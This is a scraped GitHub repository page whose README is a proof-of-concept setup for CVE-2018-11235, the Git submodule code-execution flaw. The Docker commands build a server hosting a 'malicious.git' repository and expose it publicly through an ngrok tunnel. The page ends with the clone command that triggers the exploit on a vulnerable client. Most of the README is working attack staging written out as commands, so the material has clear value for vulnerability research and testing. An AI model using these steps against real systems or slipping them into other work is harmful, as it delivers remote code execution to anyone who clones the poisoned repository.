https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
Last synced: 8 months ago
JSON representation
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
- Host: GitHub
- URL: https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
- Owner: twseptian
- Created: 2022-03-02T16:26:52.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-03-02T16:39:06.000Z (over 3 years ago)
- Last Synced: 2024-12-26T03:43:19.826Z (10 months ago)
- Language: Dockerfile
- Size: 4.88 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
CVE-2018-11235-Git PoC and tunneling with docker ngrok
### Build Dockerfile
```bash
$ docker build -t cve-2018-11235 .
```
### Create custom network for `ngrok`
```bash
$ docker network create myngroknet
```
### Start Git Http Server
```bash
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235
```
### Start Ngrok HTTP Server for Git Server
```bash
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN
```
### You can now access the API to find the assigned domain:
```bash
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}
```
### PoC on Vulnerable Git Server
```bash
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
```
### References:
- [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
- [CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [Expose Docker Container services on the Internet using the ngrok docker image](https://medium.com/oracledevs/expose-docker-container-services-on-the-internet-using-the-ngrok-docker-image-3f1ea0f9c47a)
- [wernight/ngrok](https://hub.docker.com/r/wernight/ngrok/)
- [CVE-2018-11235 - Quick & Dirty PoC](https://atorralba.github.io/CVE-2018-11235/)